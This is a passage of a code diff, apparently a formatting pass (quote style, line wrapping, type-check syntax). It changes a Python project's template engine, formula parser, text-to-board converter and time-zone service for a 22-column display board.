-        text_without_fills = fill_pattern.sub('', text)
+        text_without_fills = fill_pattern.sub("", text)
         tile_count = self._count_tiles(text_without_fills)
 
         if tile_count >= width:
@@ -1274,13 +1281,13 @@ class TemplateEngine:
             fill_width = base_fill + (1 if i < extra else 0)
 
             # Get the repeat pattern (group 1 from regex, or space as default)
-            repeat_pattern = match.group(1) if match.group(1) else ' '
+            repeat_pattern = match.group(1) if match.group(1) else " "
 
             # Check if pattern is a color name
             color_code = BoardChars.get_color_code(repeat_pattern)
             if color_code is not None:
                 # Repeat color tiles using the special color marker
-                fill_content = f'{{{color_code}}}' * fill_width
+                fill_content = f"{{{color_code}}}" * fill_width
             else:
                 # Calculate how many times to repeat the text pattern
                 pattern_len = len(repeat_pattern)
@@ -1290,7 +1297,7 @@ class TemplateEngine:
                     remainder = fill_width % pattern_len
                     fill_content = (repeat_pattern * full_repeats) + repeat_pattern[:remainder]
                 else:
-                    fill_content = ' ' * fill_width
+                    fill_content = " " * fill_width
 
             # Replace this specific match with the repeated pattern
             result = result.replace(match.group(0), fill_content, 1)
@@ -1329,47 +1336,41 @@ class TemplateEngine:
             List of validation errors (empty if valid)
         """
         errors = []
-        lines = template.split('\n')
+        lines = template.split("\n")
 
         # Get available sources based on system mode
         available_sources = self._get_all_known_sources()
 
         for line_num, line in enumerate(lines, 1):
             # Check for unclosed variable braces
-            open_count = line.count('{{')
-            close_count = line.count('}}')
+            open_count = line.count("{{")
+            close_count = line.count("}}")
             if open_count != close_count:
-                errors.append(TemplateError(
-                    line=line_num,
-                    column=0,
-                    message="Mismatched variable braces {{}}"
-                ))
+                errors.append(TemplateError(line=line_num, column=0, message="Mismatched variable braces {{}}"))
 
             # Calculate max possible line length
             max_length = self._calculate_max_line_length(line)
             if max_length > 22:
-                errors.append(TemplateError(
-                    line=line_num,
-                    column=22,
-                    message=f"Line may be too long (up to {max_length} chars, max 22)"
-                ))
+                errors.append(
+                    TemplateError(
+                        line=line_num, column=22, message=f"Line may be too long (up to {max_length} chars, max 22)"
+                    )
+                )
 
             # Check for invalid variable references
             for match in VAR_PATTERN.finditer(line):
-                expr = match.group(1).split('|')[0].strip()
+                expr = match.group(1).split("|")[0].strip()
                 # Skip formula bodies -- they're validated in the separate
                 # ``find_formulas`` loop below.
-                if expr.startswith('='):
+                if expr.startswith("="):
                     continue
-                parts = expr.split('.')
+                parts = expr.split(".")
                 if len(parts) >= 2:
                     source = parts[0].lower()
                     if source not in available_sources:
-                        errors.append(TemplateError(
-                            line=line_num,
-                            column=match.start(),
-                            message=f"Unknown source: {source}"
-                        ))
+                        errors.append(
+                            TemplateError(line=line_num, column=match.start(), message=f"Unknown source: {source}")
+                        )
 
             # Validate inline formulas ({{= ... }}). This surfaces parse
             # errors, unknown function names, unknown variable sources,
@@ -1379,11 +1380,13 @@ class TemplateEngine:
                 if not body:
                     continue
                 for issue in validate_expression(body, known_sources=available_sources):
-                    errors.append(TemplateError(
-                        line=line_num,
-                        column=start,
-                        message=f"Formula {issue.code}: {issue.message}",
-                    ))
+                    errors.append(
+                        TemplateError(
+                            line=line_num,
+                            column=start,
+                            message=f"Formula {issue.code}: {issue.message}",
+                        )
+                    )
 
         return errors
 
@@ -1413,7 +1416,7 @@ class TemplateEngine:
             Maximum possible character count after rendering
         """
         # If line has |wrap, it handles overflow automatically
-        if '|wrap}}' in line or '|wrap|' in line:
+        if "|wrap}}" in line or "|wrap|" in line:
             return 22  # Wrap ensures lines don't overflow
 
         # Start with the line
@@ -1421,12 +1424,16 @@ class TemplateEngine:
 
         # Remove color markers (they become single tiles, count as 1 char each)
         # Replace {color} with single char placeholder
-        result = re.sub(r'\{(red|orange|yellow|green|blue|violet|purple|white|black|6[3-9]|70)\}', 'C', result, flags=re.IGNORECASE)
-        result = re.sub(r'\{/(red|orange|yellow|green|blue|violet|purple|white|black)?\}', '', result, flags=re.IGNORECASE)
+        result = re.sub(
+            r"\{(red|orange|yellow|green|blue|violet|purple|white|black|6[3-9]|70)\}", "C", result, flags=re.IGNORECASE
+        )
+        result = re.sub(
+            r"\{/(red|orange|yellow|green|blue|violet|purple|white|black)?\}", "", result, flags=re.IGNORECASE
+        )
 
         # Replace symbols with their character equivalent (usually 1-2 chars)
         for symbol, char in SYMBOL_CHARS.items():
-            result = re.sub(rf'\{{{symbol}\}}', char, result, flags=re.IGNORECASE)
+            result = re.sub(rf"\{{{symbol}\}}", char, result, flags=re.IGNORECASE)
 
         # Get max lengths from appropriate source
         max_lengths = self._get_max_lengths_for_validation()
@@ -1435,11 +1442,11 @@ class TemplateEngine:
         def replace_with_max_length(match):
             expr = match.group(1).strip()
             # Remove filters for lookup
-            var_part = expr.split('|')[0].strip().lower()
+            var_part = expr.split("|")[0].strip().lower()
 
             # Check for color rules (adds 2 chars: color tile + space)
             color_prefix_len = 0
-            parts = var_part.split('.')
+            parts = var_part.split(".")
             if len(parts) >= 2:
                 plugin_id = parts[0]
                 field = parts[1]
@@ -1460,7 +1467,7 @@ class TemplateEngine:
                 except Exception:
                     logger.debug("Error getting color rules for variable %s", var_part, exc_info=True)
             max_len = max_lengths.get(var_part, 22)  # Default to full board width
-            return 'X' * (max_len + color_prefix_len)
+            return "X" * (max_len + color_prefix_len)
 
         result = VAR_PATTERN.sub(replace_with_max_length, result)
 
@@ -1498,10 +1505,9 @@ class TemplateEngine:
         Useful for getting plain text length or display.
         """
         # Remove variables that weren't resolved
-        result = re.sub(r'\{\{[^}]*\}\}', '', text)
+        result = re.sub(r"\{\{[^}]*\}\}", "", text)
         # Remove color markers
-        result = re.sub(r'\{[^}]*\}', '', result)
-        return result
+        return re.sub(r"\{[^}]*\}", "", result)
 
 
 # Singleton instance
@@ -1525,4 +1531,3 @@ def reset_template_engine() -> None:
     if _template_engine is not None:
         _template_engine.reset_cache()
     logger.info("Template engine reset")
-

--- a/src/templates/expressions.py
+++ b/src/templates/expressions.py
@@ -108,8 +108,23 @@ class Token:
 
 # Multi-character operators must be matched before single-character ones.
 _OPERATORS = (
-    "==", "!=", "<>", "<=", ">=", "&&", "||",
-    "<", ">", "=", "+", "-", "*", "/", "%", "&", "!",
+    "==",
+    "!=",
+    "<>",
+    "<=",
+    ">=",
+    "&&",
+    "||",
+    "<",
+    ">",
+    "=",
+    "+",
+    "-",
+    "*",
+    "/",
+    "%",
+    "&",
+    "!",
 )
 
 
@@ -156,9 +171,7 @@ def _tokenize(source: str) -> list[Token]:
             while i < n and source[i] != '"':
                 if source[i] == "\\" and i + 1 < n:
                     nxt = source[i + 1]
-                    buf.append(
-                        {"n": "\n", "t": "\t", "r": "\r", '"': '"', "\\": "\\"}.get(nxt, nxt)
-                    )
+                    buf.append({"n": "\n", "t": "\t", "r": "\r", '"': '"', "\\": "\\"}.get(nxt, nxt))
                     i += 2
                 else:
                     buf.append(source[i])
@@ -174,17 +187,13 @@ def _tokenize(source: str) -> list[Token]:
         if ch.isalpha() or ch == "_":
             start = i
             i += 1
-            while i < n and (
-                source[i].isalnum() or source[i] in ("_", ":", ".")
-            ):
+            while i < n and (source[i].isalnum() or source[i] in ("_", ":", ".")):
                 i += 1
             text = source[start:i]
             # Strip a trailing dot which is almost certainly a typo, leaving
             # it would produce a misleading "Unknown source" error.
             if text.endswith("."):
-                raise FormulaError(
-                    "#SYNTAX", f"Trailing dot in identifier: {text}", pos=start
-                )
+                raise FormulaError("#SYNTAX", f"Trailing dot in identifier: {text}", pos=start)
             tokens.append(Token(_T_IDENT, text, start))
             continue
 
@@ -213,9 +222,7 @@ def _tokenize(source: str) -> list[Token]:
         if matched:
             continue
 
-        raise FormulaError(
-            "#SYNTAX", f"Unexpected character {ch!r} at position {i}", pos=i
-        )
+        raise FormulaError("#SYNTAX", f"Unexpected character {ch!r} at position {i}", pos=i)
 
     tokens.append(Token(_T_EOF, None, n))
     return tokens
@@ -434,9 +441,7 @@ class _Parser:
                         args.append(self._parse_or())
                 close = self._advance()
                 if close.kind != _T_RPAREN:
-                    raise FormulaError(
-                        "#SYNTAX", f"Missing ')' in call to {name}", pos=close.pos
-                    )
+                    raise FormulaError("#SYNTAX", f"Missing ')' in call to {name}", pos=close.pos)
                 return _Call(upper, args)
 
             # Variable reference
@@ -472,7 +477,7 @@ def _to_number(value: Any) -> float:
     """Coerce a value to a number, raising ``#VALUE`` on failure."""
     if isinstance(value, bool):
         return 1.0 if value else 0.0
-    if isinstance(value, (int, float)):
+    if isinstance(value, int | float):
         return float(value)
     if value is None:
         return 0.0
@@ -492,7 +497,7 @@ def _to_number(value: Any) -> float:
 def _to_bool(value: Any) -> bool:
     if isinstance(value, bool):
         return value
-    if isinstance(value, (int, float)):
+    if isinstance(value, int | float):
         return value != 0
     if value is None:
         return False
@@ -526,7 +531,7 @@ def _to_string(value: Any) -> str:
 
 
 def _looks_numeric(value: Any) -> bool:
-    if isinstance(value, (int, float)) and not isinstance(value, bool):
+    if isinstance(value, int | float) and not isinstance(value, bool):
         return True
     if isinstance(value, str):
         try:
@@ -701,6 +706,7 @@ def _math_unary(name: str, fn: Callable[[float], float]) -> Callable[[list[Any]]
         if err is not None:
             return err
         return fn(_to_number(args[0]))
+
     return impl
 
 
@@ -722,7 +728,7 @@ def _fn_roundup(args: list[Any]) -> Any:
         return err
     x = _to_number(args[0])
     n = int(_to_number(args[1])) if len(args) == 2 else 0
-    multiplier = 10 ** n
+    multiplier = 10**n
     if x >= 0:
         return math.ceil(x * multiplier) / multiplier
     return math.floor(x * multiplier) / multiplier
@@ -736,7 +742,7 @@ def _fn_rounddown(args: list[Any]) -> Any:
         return err
     x = _to_number(args[0])
     n = int(_to_number(args[1])) if len(args) == 2 else 0
-    multiplier = 10 ** n
+    multiplier = 10**n
     if x >= 0:
         return math.floor(x * multiplier) / multiplier
     return math.ceil(x * multiplier) / multiplier
@@ -1064,7 +1070,7 @@ def _fn_color(args: list[Any]) -> Any:
     if err is not None:
         return err
     raw = args[0]
-    if isinstance(raw, (int, float)) and not isinstance(raw, bool):
+    if isinstance(raw, int | float) and not isinstance(raw, bool):
         code = int(raw)
     else:
         name = _to_string(raw).strip().lower()
@@ -1159,59 +1165,59 @@ _BUILTINS: dict[str, Callable[[list[Any]], Any]] = {
 
 _SIGNATURES: dict[str, tuple[str, str, str]] = {
     # Logic
-    "IF":        ("logic", "IF(cond, then[, else])",          "Conditional value"),
-    "IFS":       ("logic", "IFS(c1, v1, c2, v2, ...[, def])", "First matching condition's value"),
-    "SWITCH":    ("logic", "SWITCH(x, m1, r1, ...[, def])",   "Match value against options"),
-    "AND":       ("logic", "AND(a, b, ...)",                  "True if all args truthy (short-circuit)"),
-    "OR":        ("logic", "OR(a, b, ...)",                   "True if any arg truthy (short-circuit)"),
-    "NOT":       ("logic", "NOT(x)",                          "Logical negation"),
-    "IFERROR":   ("logic", "IFERROR(expr, fallback)",         "Replace error result with fallback"),
-    "ISERROR":   ("logic", "ISERROR(expr)",                   "True if expr evaluated to an error"),
-    "ISBLANK":   ("logic", "ISBLANK(expr)",                   "True if expr is null/empty/missing"),
-    "DEFAULT":   ("logic", "DEFAULT(expr, fallback)",         "Fallback for error/null/blank"),
-    "COALESCE":  ("logic", "COALESCE(a, b, c, ...)",          "First non-error/non-blank value"),
+    "IF": ("logic", "IF(cond, then[, else])", "Conditional value"),
+    "IFS": ("logic", "IFS(c1, v1, c2, v2, ...[, def])", "First matching condition's value"),
+    "SWITCH": ("logic", "SWITCH(x, m1, r1, ...[, def])", "Match value against options"),
+    "AND": ("logic", "AND(a, b, ...)", "True if all args truthy (short-circuit)"),
+    "OR": ("logic", "OR(a, b, ...)", "True if any arg truthy (short-circuit)"),
+    "NOT": ("logic", "NOT(x)", "Logical negation"),
+    "IFERROR": ("logic", "IFERROR(expr, fallback)", "Replace error result with fallback"),
+    "ISERROR": ("logic", "ISERROR(expr)", "True if expr evaluated to an error"),
+    "ISBLANK": ("logic", "ISBLANK(expr)", "True if expr is null/empty/missing"),
+    "DEFAULT": ("logic", "DEFAULT(expr, fallback)", "Fallback for error/null/blank"),
+    "COALESCE": ("logic", "COALESCE(a, b, c, ...)", "First non-error/non-blank value"),
     # Math
-    "ABS":       ("math",  "ABS(x)",                          "Absolute value"),
-    "FLOOR":     ("math",  "FLOOR(x)",                        "Round toward -infinity"),
-    "CEIL":      ("math",  "CEIL(x)",                         "Round toward +infinity"),
-    "INT":       ("math",  "INT(x)",                          "Truncate toward zero"),
-    "ROUND":     ("math",  "ROUND(x[, n])",                   "Round to n decimals"),
-    "ROUNDUP":   ("math",  "ROUNDUP(x[, n])",                 "Round away from zero"),
-    "ROUNDDOWN": ("math",  "ROUNDDOWN(x[, n])",               "Round toward zero"),
-    "POWER":     ("math",  "POWER(base, exp)",                "Exponentiation"),
-    "SQRT":      ("math",  "SQRT(x)",                         "Square root"),
-    "MIN":       ("math",  "MIN(a, b, ...)",                  "Smallest value"),
-    "MAX":       ("math",  "MAX(a, b, ...)",                  "Largest value"),
-    "SUM":       ("math",  "SUM(a, b, ...)",                  "Sum of values"),
-    "AVG":       ("math",  "AVG(a, b, ...)",                  "Arithmetic mean"),
-    "MOD":       ("math",  "MOD(a, b)",                       "a modulo b"),
-    "SIGN":      ("math",  "SIGN(x)",                         "-1, 0, or 1"),
+    "ABS": ("math", "ABS(x)", "Absolute value"),
+    "FLOOR": ("math", "FLOOR(x)", "Round toward -infinity"),
+    "CEIL": ("math", "CEIL(x)", "Round toward +infinity"),
+    "INT": ("math", "INT(x)", "Truncate toward zero"),
+    "ROUND": ("math", "ROUND(x[, n])", "Round to n decimals"),
+    "ROUNDUP": ("math", "ROUNDUP(x[, n])", "Round away from zero"),
+    "ROUNDDOWN": ("math", "ROUNDDOWN(x[, n])", "Round toward zero"),
+    "POWER": ("math", "POWER(base, exp)", "Exponentiation"),
+    "SQRT": ("math", "SQRT(x)", "Square root"),
+    "MIN": ("math", "MIN(a, b, ...)", "Smallest value"),
+    "MAX": ("math", "MAX(a, b, ...)", "Largest value"),
+    "SUM": ("math", "SUM(a, b, ...)", "Sum of values"),
+    "AVG": ("math", "AVG(a, b, ...)", "Arithmetic mean"),
+    "MOD": ("math", "MOD(a, b)", "a modulo b"),
+    "SIGN": ("math", "SIGN(x)", "-1, 0, or 1"),
     # Text
-    "UPPER":     ("text",  "UPPER(s)",                        "Convert to uppercase"),
-    "LOWER":     ("text",  "LOWER(s)",                        "Convert to lowercase"),
-    "TRIM":      ("text",  "TRIM(s)",                         "Strip leading/trailing whitespace"),
-    "PROPER":    ("text",  "PROPER(s)",                       "Title-case each word"),
-    "LEN":       ("text",  "LEN(s)",                          "Character length"),
-    "LEFT":      ("text",  "LEFT(s, n)",                      "First n characters"),
-    "RIGHT":     ("text",  "RIGHT(s, n)",                     "Last n characters"),
-    "MID":       ("text",  "MID(s, start, length)",           "Substring (start is 1-indexed)"),
-    "FIND":      ("text",  "FIND(needle, haystack[, start])", "Case-sensitive position (1-indexed); #VALUE if missing"),
-    "SEARCH":    ("text",  "SEARCH(needle, haystack[, start])", "Case-insensitive position; 0 if missing"),
-    "CONCAT":    ("text",  "CONCAT(a, b, ...)",               "Join values as text"),
-    "REPLACE":   ("text",  "REPLACE(s, find, repl)",          "Replace all occurrences"),
-    "REPT":      ("text",  "REPT(s, n)",                      "Repeat n times (capped at 1024)"),
-    "CONTAINS":  ("text",  "CONTAINS(s, sub)",                "True if s contains sub"),
-    "STARTSWITH":("text",  "STARTSWITH(s, prefix)",           "True if s starts with prefix"),
-    "ENDSWITH":  ("text",  "ENDSWITH(s, suffix)",             "True if s ends with suffix"),
-    "PAD":       ("text",  "PAD(s, width)",                   "Right-pad to width"),
-    "PADLEFT":   ("text",  "PADLEFT(s, width)",               "Left-pad to width"),
-    "CENTER":    ("text",  "CENTER(s, width)",                "Center within width"),
+    "UPPER": ("text", "UPPER(s)", "Convert to uppercase"),
+    "LOWER": ("text", "LOWER(s)", "Convert to lowercase"),
+    "TRIM": ("text", "TRIM(s)", "Strip leading/trailing whitespace"),
+    "PROPER": ("text", "PROPER(s)", "Title-case each word"),
+    "LEN": ("text", "LEN(s)", "Character length"),
+    "LEFT": ("text", "LEFT(s, n)", "First n characters"),
+    "RIGHT": ("text", "RIGHT(s, n)", "Last n characters"),
+    "MID": ("text", "MID(s, start, length)", "Substring (start is 1-indexed)"),
+    "FIND": ("text", "FIND(needle, haystack[, start])", "Case-sensitive position (1-indexed); #VALUE if missing"),
+    "SEARCH": ("text", "SEARCH(needle, haystack[, start])", "Case-insensitive position; 0 if missing"),
+    "CONCAT": ("text", "CONCAT(a, b, ...)", "Join values as text"),
+    "REPLACE": ("text", "REPLACE(s, find, repl)", "Replace all occurrences"),
+    "REPT": ("text", "REPT(s, n)", "Repeat n times (capped at 1024)"),
+    "CONTAINS": ("text", "CONTAINS(s, sub)", "True if s contains sub"),
+    "STARTSWITH": ("text", "STARTSWITH(s, prefix)", "True if s starts with prefix"),
+    "ENDSWITH": ("text", "ENDSWITH(s, suffix)", "True if s ends with suffix"),
+    "PAD": ("text", "PAD(s, width)", "Right-pad to width"),
+    "PADLEFT": ("text", "PADLEFT(s, width)", "Left-pad to width"),
+    "CENTER": ("text", "CENTER(s, width)", "Center within width"),
     # Conversion
-    "TEXT":      ("convert", "TEXT(x)",                       "Convert to string"),
-    "NUM":       ("convert", "NUM(x)",                        "Convert to number"),
-    "FIXED":     ("convert", "FIXED(x[, n])",                 "Format with n decimals (default 2)"),
+    "TEXT": ("convert", "TEXT(x)", "Convert to string"),
+    "NUM": ("convert", "NUM(x)", "Convert to number"),
+    "FIXED": ("convert", "FIXED(x[, n])", "Format with n decimals (default 2)"),
     # Color
-    "COLOR":     ("color",   "COLOR(name_or_code)",           "Single color tile (e.g. \"red\" or 67)"),
+    "COLOR": ("color", "COLOR(name_or_code)", 'Single color tile (e.g. "red" or 67)'),
 }
 
 
@@ -1430,8 +1436,8 @@ class ExpressionIssue:
     Designed to be JSON-serialisable for editor integrations.
     """
 
-    code: str           # e.g. "#SYNTAX", "#NAME?"
-    message: str        # Human-readable diagnostic
+    code: str  # e.g. "#SYNTAX", "#NAME?"
+    message: str  # Human-readable diagnostic
     pos: int | None  # Character offset within the expression (None if unknown)
 
 
@@ -1495,22 +1501,54 @@ def validate_expression(
 # accept any number of arguments (we still rely on runtime ``_expect_args``
 # checks for the strict variants).
 _ARITY: dict[str, tuple[int, int | None]] = {
-    "IF": (2, 3), "NOT": (1, 1), "IFERROR": (2, 2), "ISERROR": (1, 1),
-    "ISBLANK": (1, 1), "DEFAULT": (2, 2), "COALESCE": (1, None),
-    "ABS": (1, 1), "FLOOR": (1, 1), "CEIL": (1, 1), "INT": (1, 1),
-    "ROUND": (1, 2), "ROUNDUP": (1, 2), "ROUNDDOWN": (1, 2),
-    "POWER": (2, 2), "SQRT": (1, 1), "MOD": (2, 2), "SIGN": (1, 1),
-    "MIN": (1, None), "MAX": (1, None), "SUM": (1, None), "AVG": (1, None),
-    "AND": (0, None), "OR": (0, None),
-    "UPPER": (1, 1), "LOWER": (1, 1), "TRIM": (1, 1), "PROPER": (1, 1),
-    "LEN": (1, 1), "LEFT": (2, 2), "RIGHT": (2, 2), "MID": (3, 3),
-    "FIND": (2, 3), "SEARCH": (2, 3),
-    "REPLACE": (3, 3), "REPT": (2, 2),
-    "CONTAINS": (2, 2), "STARTSWITH": (2, 2), "ENDSWITH": (2, 2),
-    "PAD": (2, 2), "PADLEFT": (2, 2), "CENTER": (2, 2),
-    "TEXT": (1, 1), "NUM": (1, 1), "FIXED": (1, 2),
+    "IF": (2, 3),
+    "NOT": (1, 1),
+    "IFERROR": (2, 2),
+    "ISERROR": (1, 1),
+    "ISBLANK": (1, 1),
+    "DEFAULT": (2, 2),
+    "COALESCE": (1, None),
+    "ABS": (1, 1),
+    "FLOOR": (1, 1),
+    "CEIL": (1, 1),
+    "INT": (1, 1),
+    "ROUND": (1, 2),
+    "ROUNDUP": (1, 2),
+    "ROUNDDOWN": (1, 2),
+    "POWER": (2, 2),
+    "SQRT": (1, 1),
+    "MOD": (2, 2),
+    "SIGN": (1, 1),
+    "MIN": (1, None),
+    "MAX": (1, None),
+    "SUM": (1, None),
+    "AVG": (1, None),
+    "AND": (0, None),
+    "OR": (0, None),
+    "UPPER": (1, 1),
+    "LOWER": (1, 1),
+    "TRIM": (1, 1),
+    "PROPER": (1, 1),
+    "LEN": (1, 1),
+    "LEFT": (2, 2),
+    "RIGHT": (2, 2),
+    "MID": (3, 3),
+    "FIND": (2, 3),
+    "SEARCH": (2, 3),
+    "REPLACE": (3, 3),
+    "REPT": (2, 2),
+    "CONTAINS": (2, 2),
+    "STARTSWITH": (2, 2),
+    "ENDSWITH": (2, 2),
+    "PAD": (2, 2),
+    "PADLEFT": (2, 2),
+    "CENTER": (2, 2),
+    "TEXT": (1, 1),
+    "NUM": (1, 1),
+    "FIXED": (1, 2),
     "COLOR": (1, 1),
-    "IFS": (2, None), "SWITCH": (3, None),
+    "IFS": (2, None),
+    "SWITCH": (3, None),
 }
 
 
@@ -1571,10 +1609,7 @@ def find_formulas(template: str) -> list[tuple[int, int, str]]:
     Useful for editor tooling that wants to underline / lint the formula
     bodies in-place.
     """
-    return [
-        (m.start(), m.end(), m.group(1).strip())
-        for m in _FORMULA_PATTERN.finditer(template)
-    ]
+    return [(m.start(), m.end(), m.group(1).strip()) for m in _FORMULA_PATTERN.finditer(template)]
 
 
 def list_builtins() -> tuple[str, ...]:
@@ -1599,9 +1634,9 @@ __all__ = [
     "ExpressionIssue",
     "FormulaError",
     "evaluate",
-    "validate_expression",
-    "render_expressions",
     "find_formulas",
-    "list_builtins",
     "function_signatures",
+    "list_builtins",
+    "render_expressions",
+    "validate_expression",
 ]

--- a/src/text_to_board.py
+++ b/src/text_to_board.py
@@ -28,12 +28,12 @@ COLOR_CODES = {
 # Parse color markers: {63}, {red}, {/red}, {/} - each produces a single colored tile
 # Note: Single brackets are used after template normalization to avoid conflicting with {{variable}} syntax
 COLOR_MARKER_PATTERN = re.compile(
-    r'\{(?:'
-    r'(6[3-9]|7[01])|'  # Numeric codes 63-71
-    r'(red|orange|yellow|green|blue|violet|purple|white|black|filled)|'  # Named colors
-    r'(/(?:red|orange|yellow|green|blue|violet|purple|white|black|filled)?)'  # End tags {/} or {/red}
-    r')\}',
-    re.IGNORECASE
+    r"\{(?:"
+    r"(6[3-9]|7[01])|"  # Numeric codes 63-71
+    r"(red|orange|yellow|green|blue|violet|purple|white|black|filled)|"  # Named colors
+    r"(/(?:red|orange|yellow|green|blue|violet|purple|white|black|filled)?)"  # End tags {/} or {/red}
+    r")\}",
+    re.IGNORECASE,
 )
 
 
@@ -64,7 +64,7 @@ def text_to_board_array(text: str, use_color_tiles: bool = True, rows: int = 6, 
     board = [[BoardChars.SPACE] * cols for _ in range(rows)]
 
     # Split into lines (max rows)
-    lines = text.split('\n')[:rows]
+    lines = text.split("\n")[:rows]
 
     # Process each line
     for row_idx, line in enumerate(lines):
@@ -132,48 +132,54 @@ def format_board_array_preview(board: list[list[int]]) -> str:
     # Character code to character mapping (reverse lookup)
     # Based on official board character codes
     code_to_char = {
-        0: ' ',  # Blank/space
+        0: " ",  # Blank/space
     }
 
     # Letters A-Z (codes 1-26)
     for i in range(26):
-        code_to_char[i + 1] = chr(ord('A') + i)
+        code_to_char[i + 1] = chr(ord("A") + i)
 
     # Numbers: 1-9 are codes 27-35, 0 is code 36
     for i in range(1, 10):
         code_to_char[i + 26] = str(i)  # 1→27, 2→28, ..., 9→35
-    code_to_char[36] = '0'
+    code_to_char[36] = "0"
 
     # Punctuation (official codes)
     special_chars = {
-        37: '!',   # Exclamation
-        38: '@',   # At
-        39: '#',   # Pound
-        40: '$',   # Dollar
-        41: '(',   # Left paren
-        42: ')',   # Right paren
-        44: '-',   # Dash/hyphen
-        46: '+',   # Plus
-        47: '&',   # Ampersand
-        48: '=',   # Equals
-        49: ';',   # Semicolon
-        50: ':',   # Colon
-        52: "'",   # Single quote
-        53: '"',   # Double quote
-        54: '%',   # Percent
-        55: ',',   # Comma
-        56: '.',   # Period
-        59: '/',   # Slash
-        60: '?',   # Question
-        62: '°',   # Degree
+        37: "!",  # Exclamation
+        38: "@",  # At
+        39: "#",  # Pound
+        40: "$",  # Dollar
+        41: "(",  # Left paren
+        42: ")",  # Right paren
+        44: "-",  # Dash/hyphen
+        46: "+",  # Plus
+        47: "&",  # Ampersand
+        48: "=",  # Equals
+        49: ";",  # Semicolon
+        50: ":",  # Colon
+        52: "'",  # Single quote
+        53: '"',  # Double quote
+        54: "%",  # Percent
+        55: ",",  # Comma
+        56: ".",  # Period
+        59: "/",  # Slash
+        60: "?",  # Question
+        62: "°",  # Degree
     }
     code_to_char.update(special_chars)
 
     # Color tiles
     color_names = {
-        63: "[RED]", 64: "[ORG]", 65: "[YEL]", 66: "[GRN]",
-        67: "[BLU]", 68: "[VIO]", 69: "[WHT]", 70: "[BLK]",
-        71: "[FIL]"
+        63: "[RED]",
+        64: "[ORG]",
+        65: "[YEL]",
+        66: "[GRN]",
+        67: "[BLU]",
+        68: "[VIO]",
+        69: "[WHT]",
+        70: "[BLK]",
+        71: "[FIL]",
     }
 
     for row in board:
@@ -182,10 +188,10 @@ def format_board_array_preview(board: list[list[int]]) -> str:
             if code in color_names:
                 line_chars.append(color_names[code])
             else:
-                line_chars.append(code_to_char.get(code, '?'))
-        lines.append(''.join(line_chars))
+                line_chars.append(code_to_char.get(code, "?"))
+        lines.append("".join(line_chars))
 
-    return '\n'.join(lines)
+    return "\n".join(lines)
 
 
 def validate_board_array(board: list[list[int]], rows: int = 6, cols: int = 22) -> bool:
@@ -201,12 +207,16 @@ def validate_board_array(board: list[list[int]], rows: int = 6, cols: int = 22) 
         True if valid, False otherwise
     """
     if not isinstance(board, list) or len(board) != rows:
-        logger.error(f"Invalid board: expected {rows} rows, got {len(board) if isinstance(board, list) else 'not a list'}")
+        logger.error(
+            f"Invalid board: expected {rows} rows, got {len(board) if isinstance(board, list) else 'not a list'}"
+        )
         return False
 
     for i, row in enumerate(board):
         if not isinstance(row, list) or len(row) != cols:
-            logger.error(f"Invalid row {i}: expected {cols} columns, got {len(row) if isinstance(row, list) else 'not a list'}")
+            logger.error(
+                f"Invalid row {i}: expected {cols} columns, got {len(row) if isinstance(row, list) else 'not a list'}"
+            )
             return False
 
         for j, code in enumerate(row):
@@ -215,4 +225,3 @@ def validate_board_array(board: list[list[int]], rows: int = 6, cols: int = 22) 
                 return False
 
     return True
-

--- a/src/text_utils.py
+++ b/src/text_utils.py
@@ -2,7 +2,7 @@
 
 import re
 
-ALIGNMENT_PREFIX_RE = re.compile(r'^\{(left|center|right)\}', re.IGNORECASE)
+ALIGNMENT_PREFIX_RE = re.compile(r"^\{(left|center|right)\}", re.IGNORECASE)
 
 
 def extract_alignment_from_line(line: str) -> tuple[str, bool, str]:
@@ -19,12 +19,12 @@ def extract_alignment_from_line(line: str) -> tuple[str, bool, str]:
     remaining = line
     wrap_enabled = False
 
-    if remaining.startswith('{wrap}'):
+    if remaining.startswith("{wrap}"):
         wrap_enabled = True
         remaining = remaining[6:]
 
     m = ALIGNMENT_PREFIX_RE.match(remaining)
     if m:
-        return (m.group(1).lower(), wrap_enabled, remaining[m.end():])
+        return (m.group(1).lower(), wrap_enabled, remaining[m.end() :])
 
-    return ('left', wrap_enabled, remaining)
+    return ("left", wrap_enabled, remaining)

--- a/src/time_service.py
+++ b/src/time_service.py
@@ -106,11 +106,11 @@ class TimeService:
             offset_part = time_str[5:]  # +/-HH:MM
 
             # Parse time
-            hour, minute = map(int, time_part.split(':'))
+            hour, minute = map(int, time_part.split(":"))
 
             # Parse offset
-            offset_sign = 1 if offset_part[0] == '+' else -1
-            offset_hours, offset_minutes = map(int, offset_part[1:].split(':'))
+            offset_sign = 1 if offset_part[0] == "+" else -1
+            offset_hours, offset_minutes = map(int, offset_part[1:].split(":"))
             offset_total_minutes = offset_sign * (offset_hours * 60 + offset_minutes)
 
             # Create a datetime for today at this time in the specified timezone
@@ -122,12 +122,11 @@ class TimeService:
             # If time is 20:00-08:00 (PST), that's 20:00 in a timezone 8 hours behind UTC
             # So UTC time is 20:00 + 8:00 = 04:00 next day (but we handle date separately)
             from datetime import timedelta
+
             utc_dt = naive_dt - timedelta(minutes=offset_total_minutes)
 
             # Make it timezone aware (UTC)
-            utc_dt = utc_dt.replace(tzinfo=UTC)
-
-            return utc_dt
+            return utc_dt.replace(tzinfo=UTC)
 
         except (ValueError, IndexError) as e:
             logger.warning(f"Failed to parse ISO time '{time_str}': {e}")
@@ -161,9 +160,8 @@ class TimeService:
         if start_time > end_time:
             # Window spans midnight: current must be >= start OR <= end
             return current_time >= start_time or current_time <= end_time
-        else:
-            # Same-day window: current must be >= start AND <= end
-            return start_time <= current_time <= end_time
+        # Same-day window: current must be >= start AND <= end
+        return start_time <= current_time <= end_time
 
     # Timezone conversions
 
@@ -187,10 +185,10 @@ class TimeService:
 
         try:
             # Parse local time
-            if ':' not in local_time:
+            if ":" not in local_time:
                 raise ValueError(f"Invalid time format: {local_time}")
 
-            parts = local_time.split(':')
+            parts = local_time.split(":")
             if len(parts) != 2:
                 raise ValueError(f"Invalid time format: {local_time}")
 
@@ -271,7 +269,7 @@ class TimeService:
         """
         try:
             # Parse UTC timestamp
-            utc_dt = datetime.fromisoformat(utc_timestamp.replace('Z', '+00:00'))
+            utc_dt = datetime.fromisoformat(utc_timestamp.replace("Z", "+00:00"))
 
             # Ensure it's UTC-aware
             if utc_dt.tzinfo is None:
@@ -304,6 +302,7 @@ def _get_configured_timezone() -> str:
     """
     try:
         from .config import Config
+
         return Config.GENERAL_TIMEZONE
     except Exception:
         return "UTC"

--- a/src/triggers/service.py
+++ b/src/triggers/service.py
